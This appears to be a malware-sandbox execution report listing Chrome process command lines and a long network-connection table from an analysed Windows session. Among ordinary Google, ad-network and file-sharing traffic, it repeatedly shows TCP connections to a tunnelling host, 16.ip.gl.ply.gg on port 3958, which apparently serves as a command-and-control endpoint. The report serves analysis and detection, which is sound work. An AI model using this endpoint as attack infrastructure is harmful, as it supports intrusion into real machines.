"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=5852 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=6008 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=5716 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=4840 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=5208 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=5244 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=3988 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=5144 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=4980 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=5316 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=4076 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=4572 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=5384 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=6616 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=5356 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=5368 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=5584 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=5600 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=5616 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6892 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5840 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=6036 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=3756 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=5172 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=6988 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=2764 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --mojo-platform-channel-handle=4856 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --mojo-platform-channel-handle=4744 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=6832 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=6720 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=5968 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --mojo-platform-channel-handle=4840 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --mojo-platform-channel-handle=6560 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --mojo-platform-channel-handle=5428 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --mojo-platform-channel-handle=5860 --field-trial-handle=1252,i,135929588158991815,5923507615111954306,131072 /prefetch:1

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.200.4:443 www.google.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 142.250.179.238:443 apis.google.com tcp
N/A 224.0.0.251:5353 udp
GB 142.250.200.4:443 www.google.com udp
US 8.8.8.8:53 ssl.gstatic.com udp
US 8.8.8.8:53 consent.google.com udp
US 8.8.8.8:53 encrypted-tbn0.gstatic.com udp
GB 142.250.179.238:443 apis.google.com udp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com tcp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com tcp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com tcp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com tcp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com tcp
GB 172.217.16.238:443 encrypted-tbn0.gstatic.com tcp
US 8.8.8.8:53 16.ip.gl.ply.gg udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 encrypted-vtbn0.gstatic.com udp
GB 142.250.180.14:443 encrypted-vtbn0.gstatic.com tcp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 i.ytimg.com udp
GB 142.250.180.22:443 i.ytimg.com tcp
GB 142.250.180.22:443 i.ytimg.com tcp
US 8.8.8.8:53 rr5---sn-4g5lznlz.googlevideo.com udp
DE 74.125.104.74:443 rr5---sn-4g5lznlz.googlevideo.com tcp
DE 74.125.104.74:443 rr5---sn-4g5lznlz.googlevideo.com tcp
US 8.8.8.8:53 rr1---sn-4g5edndz.googlevideo.com udp
US 8.8.8.8:53 accounts.google.com udp
DE 74.125.162.230:443 rr1---sn-4g5edndz.googlevideo.com udp
BE 64.233.167.84:443 accounts.google.com tcp
BE 64.233.167.84:443 accounts.google.com udp
US 8.8.8.8:53 rr4---sn-q4fl6nd6.googlevideo.com udp
US 173.194.24.233:443 rr4---sn-q4fl6nd6.googlevideo.com udp
GB 142.250.180.22:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.200.33:443 yt3.ggpht.com tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 142.250.200.42:443 jnn-pa.googleapis.com udp
GB 142.250.200.33:443 yt3.ggpht.com udp
US 8.8.8.8:53 yt3.googleusercontent.com udp
GB 142.250.178.1:443 yt3.googleusercontent.com tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.178.14:443 youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
GB 172.217.16.238:443 consent.youtube.com tcp
DE 74.125.104.74:443 rr5---sn-4g5lznlz.googlevideo.com udp
US 8.8.8.8:53 rr4---sn-4g5lznle.googlevideo.com udp
DE 74.125.163.201:443 rr4---sn-4g5lznle.googlevideo.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
FR 216.58.201.98:443 googleads.g.doubleclick.net tcp
FR 216.58.201.98:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
GB 142.250.200.6:443 static.doubleclick.net tcp
FR 216.58.201.98:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 www.google.co.uk udp
GB 172.217.169.35:443 www.google.co.uk tcp
GB 142.250.178.14:443 youtube.com udp
US 8.8.8.8:53 suggestqueries-clients6.youtube.com udp
GB 142.250.200.46:443 suggestqueries-clients6.youtube.com tcp
GB 142.250.200.46:443 suggestqueries-clients6.youtube.com udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
FR 216.58.213.67:443 beacons.gcp.gvt2.com tcp
FR 216.58.213.67:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 play.google.com udp
GB 216.58.213.14:443 play.google.com tcp
GB 216.58.213.14:443 play.google.com udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
GB 216.58.212.238:443 www.youtube.com udp
GB 216.58.212.238:443 www.youtube.com tcp
FR 216.58.213.67:443 beacons.gcp.gvt2.com udp
BE 64.233.167.84:443 accounts.google.com udp
BE 64.233.167.84:443 accounts.google.com tcp
US 8.8.8.8:53 e2c34.gcp.gvt2.com udp
KR 35.216.18.75:443 e2c34.gcp.gvt2.com tcp
KR 35.216.18.75:443 e2c34.gcp.gvt2.com tcp
DE 74.125.163.201:443 rr4---sn-4g5lznle.googlevideo.com udp
US 8.8.8.8:53 beacons.gvt2.com udp
DE 172.217.16.131:443 beacons.gvt2.com tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
DE 172.217.16.131:443 beacons.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
GB 216.58.213.3:443 beacons3.gvt2.com tcp
GB 216.58.213.3:443 beacons3.gvt2.com udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
FR 216.58.201.98:443 googleads.g.doubleclick.net udp
GB 216.58.212.238:443 www.youtube.com udp
BE 64.233.167.84:443 accounts.google.com udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
GB 142.250.200.46:443 suggestqueries-clients6.youtube.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
GB 142.250.200.46:443 suggestqueries-clients6.youtube.com tcp
US 8.8.8.8:53 id.google.com udp
GB 142.250.180.22:443 i.ytimg.com udp
GB 142.250.200.6:443 static.doubleclick.net udp
GB 142.250.200.42:443 jnn-pa.googleapis.com udp
GB 172.217.16.238:443 consent.youtube.com udp
US 8.8.8.8:53 yopmail.com udp
GB 87.98.250.141:443 yopmail.com tcp
GB 87.98.250.141:443 yopmail.com tcp
GB 87.98.250.141:443 yopmail.com tcp
GB 87.98.250.141:443 yopmail.com tcp
GB 87.98.250.141:443 yopmail.com tcp
GB 87.98.250.141:443 yopmail.com tcp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 216.58.213.3:443 beacons3.gvt2.com udp
US 8.8.8.8:53 fundingchoicesmessages.google.com udp
GB 142.250.200.46:443 fundingchoicesmessages.google.com tcp
GB 142.250.200.46:443 fundingchoicesmessages.google.com udp
US 8.8.8.8:53 lh3.googleusercontent.com udp
GB 216.58.212.193:443 lh3.googleusercontent.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 www.googletagservices.com udp
US 8.8.8.8:53 s0.2mdn.net udp
FR 216.58.204.66:443 www.googletagservices.com tcp
GB 142.250.187.198:443 s0.2mdn.net tcp
US 8.8.8.8:53 cm.g.doubleclick.net udp
US 8.8.8.8:53 dsum-sec.casalemedia.com udp
US 8.8.8.8:53 ib.adnxs.com udp
US 172.64.151.101:443 dsum-sec.casalemedia.com tcp
GB 142.250.200.34:443 cm.g.doubleclick.net tcp
GB 142.250.200.34:443 cm.g.doubleclick.net tcp
NL 185.89.210.153:443 ib.adnxs.com tcp
GB 142.250.187.198:443 s0.2mdn.net udp
US 8.8.8.8:53 googleads4.g.doubleclick.net udp
US 172.64.151.101:443 dsum-sec.casalemedia.com tcp
NL 185.89.210.153:443 ib.adnxs.com tcp
GB 142.250.200.34:443 googleads4.g.doubleclick.net udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 imasdk.googleapis.com udp
GB 172.217.16.234:443 imasdk.googleapis.com tcp
GB 172.217.16.234:443 imasdk.googleapis.com tcp
US 8.8.8.8:53 csi.gstatic.com udp
US 8.8.8.8:53 bid.g.doubleclick.net udp
DE 142.250.185.227:443 csi.gstatic.com tcp
DE 142.250.185.227:443 csi.gstatic.com tcp
BE 74.125.71.157:443 bid.g.doubleclick.net tcp
US 172.64.151.101:443 dsum-sec.casalemedia.com udp
DE 142.250.185.227:443 csi.gstatic.com udp
US 8.8.8.8:53 unified.adsafeprotected.com udp
IE 34.242.41.121:443 unified.adsafeprotected.com tcp
US 8.8.8.8:53 gcdn.2mdn.net udp
GB 142.250.180.14:443 gcdn.2mdn.net tcp
US 8.8.8.8:53 r3---sn-4g5edn6r.c.2mdn.net udp
DE 74.125.153.200:443 r3---sn-4g5edn6r.c.2mdn.net tcp
DE 74.125.153.200:443 r3---sn-4g5edn6r.c.2mdn.net udp
GB 87.98.250.141:443 yopmail.com tcp
GB 87.98.250.141:443 yopmail.com tcp
US 8.8.8.8:53 ade.googlesyndication.com udp
US 8.8.8.8:53 www.filemail.com udp
NL 178.21.23.181:443 www.filemail.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
US 8.8.8.8:53 analytics.filemail.com udp
NL 20.82.124.160:443 analytics.filemail.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
GB 172.217.169.35:443 www.google.co.uk udp
NL 178.21.23.181:443 www.filemail.com tcp
US 8.8.8.8:53 3002.filemail.com udp
NO 193.30.119.102:443 3002.filemail.com tcp
NO 193.30.119.102:443 3002.filemail.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
US 8.8.8.8:53 widget.intercom.io udp
DE 13.32.27.114:443 widget.intercom.io tcp
US 8.8.8.8:53 js.intercomcdn.com udp
DE 18.66.147.3:443 js.intercomcdn.com tcp
DE 18.66.147.3:443 js.intercomcdn.com tcp
US 8.8.8.8:53 api-iam.intercom.io udp
US 52.3.143.140:443 api-iam.intercom.io tcp
US 8.8.8.8:53 nexus-websocket-a.intercom.io udp
US 34.237.73.95:443 nexus-websocket-a.intercom.io tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
NL 178.21.23.181:443 www.filemail.com tcp
NL 20.82.124.160:443 analytics.filemail.com tcp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 e2c23.gcp.gvt2.com udp
US 35.184.229.211:443 e2c23.gcp.gvt2.com tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 52.3.143.140:443 api-iam.intercom.io tcp
DE 172.217.16.131:443 beacons.gvt2.com udp
US 8.8.8.8:53 e2c68.gcp.gvt2.com udp
US 8.8.8.8:53 e2c42.gcp.gvt2.com udp
US 34.35.20.64:443 e2c68.gcp.gvt2.com tcp
DE 35.207.191.46:443 e2c42.gcp.gvt2.com tcp
US 34.35.20.64:443 e2c68.gcp.gvt2.com tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
GB 142.250.200.4:443 www.google.com udp
US 8.8.8.8:53 processhacker.sourceforge.io udp
US 104.18.39.207:443 processhacker.sourceforge.io tcp
US 104.18.39.207:443 processhacker.sourceforge.io tcp
GB 142.250.180.22:443 i.ytimg.com udp
GB 216.58.212.238:443 www.youtube.com udp
FR 216.58.201.98:443 googleads.g.doubleclick.net udp
GB 142.250.200.42:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 ipinfo.io udp
GB 142.250.200.4:80 www.google.com tcp
US 34.117.186.192:443 ipinfo.io tcp
US 34.117.186.192:443 ipinfo.io tcp
US 104.18.39.207:443 processhacker.sourceforge.io tcp
US 104.18.39.207:443 processhacker.sourceforge.io udp
US 8.8.8.8:53 sourceforge.net udp
US 104.18.37.111:443 sourceforge.net tcp
US 8.8.8.8:53 region1.google-analytics.com udp
US 216.239.32.36:443 region1.google-analytics.com tcp
US 8.8.8.8:53 stats.g.doubleclick.net udp
BE 74.125.206.157:443 stats.g.doubleclick.net tcp
US 104.18.37.111:443 sourceforge.net udp
US 8.8.8.8:53 a.fsdn.com udp
US 172.64.147.47:443 a.fsdn.com tcp
US 172.64.147.47:443 a.fsdn.com tcp
US 172.64.147.47:443 a.fsdn.com tcp
US 172.64.147.47:443 a.fsdn.com tcp
US 172.64.147.47:443 a.fsdn.com tcp
US 172.64.147.47:443 a.fsdn.com tcp
US 172.64.147.47:443 a.fsdn.com tcp
US 172.64.147.47:443 a.fsdn.com udp
US 216.239.32.36:443 region1.google-analytics.com udp
US 8.8.8.8:53 static.cloudflareinsights.com udp
US 8.8.8.8:53 d.delivery.consentmanager.net udp
US 8.8.8.8:53 cdn.consentmanager.net udp
US 8.8.8.8:53 c.sf-syn.com udp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 104.16.56.101:443 static.cloudflareinsights.com tcp
GB 195.181.164.21:443 cdn.consentmanager.net tcp
US 104.18.33.97:443 c.sf-syn.com tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.4.4:443 dns.google tcp
GB 96.17.179.184:80 apps.identrust.com tcp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 8.8.8.8:53 btloader.com udp
US 8.8.8.8:53 ib.adnxs.com udp
US 8.8.8.8:53 hbopenbid.pubmatic.com udp
US 8.8.8.8:53 fastlane.rubiconproject.com udp
US 8.8.8.8:53 ap.lijit.com udp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 8.8.8.8:53 analytics.slashdotmedia.com udp
US 8.8.8.8:53 ml314.com udp
US 172.67.41.60:443 btloader.com tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
US 216.105.38.9:443 analytics.slashdotmedia.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
US 34.117.77.79:443 ml314.com tcp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
DE 3.122.93.43:443 btlr.sharethrough.com tcp
DE 3.122.93.43:443 btlr.sharethrough.com tcp
DE 3.122.93.43:443 btlr.sharethrough.com tcp
DE 3.122.93.43:443 btlr.sharethrough.com tcp
US 8.8.8.8:53 api.btloader.com udp
US 8.8.8.8:53 ad-delivery.net udp
US 34.117.77.79:443 ml314.com udp
US 172.67.69.19:443 ad-delivery.net tcp
US 172.67.69.19:443 ad-delivery.net tcp
US 130.211.23.194:443 api.btloader.com tcp
US 8.8.8.8:53 idsync.rlcdn.com udp
US 8.8.8.8:53 match.adsrvr.org udp
US 8.8.8.8:53 sync.crwdcntrl.net udp
US 8.8.8.8:53 ps.eyeota.net udp
US 8.8.8.8:53 securepubads.g.doubleclick.net udp
US 35.244.174.68:443 idsync.rlcdn.com tcp
IE 52.212.56.60:443 dpm.demdex.net tcp
US 52.223.40.198:443 match.adsrvr.org tcp
IE 52.19.8.73:443 sync.crwdcntrl.net tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
DE 3.127.178.105:443 ps.eyeota.net tcp
US 130.211.23.194:443 api.btloader.com udp
US 35.244.174.68:443 idsync.rlcdn.com udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 e3270d7d5b7b487514d3625dee184e7e.safeframe.googlesyndication.com udp
GB 142.250.179.225:443 e3270d7d5b7b487514d3625dee184e7e.safeframe.googlesyndication.com tcp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
GB 142.250.179.225:443 e3270d7d5b7b487514d3625dee184e7e.safeframe.googlesyndication.com udp
FR 216.58.204.66:443 www.googletagservices.com udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.198:443 s0.2mdn.net udp
US 52.223.40.198:443 match.adsrvr.org tcp
GB 142.250.200.34:443 googleads4.g.doubleclick.net udp
GB 142.250.200.34:443 googleads4.g.doubleclick.net tcp
US 8.8.8.8:53 ads.pubmatic.com udp
US 8.8.8.8:53 secure.adnxs.com udp
US 8.8.8.8:53 ssbsync.smartadserver.com udp
US 52.223.40.198:443 match.adsrvr.org tcp
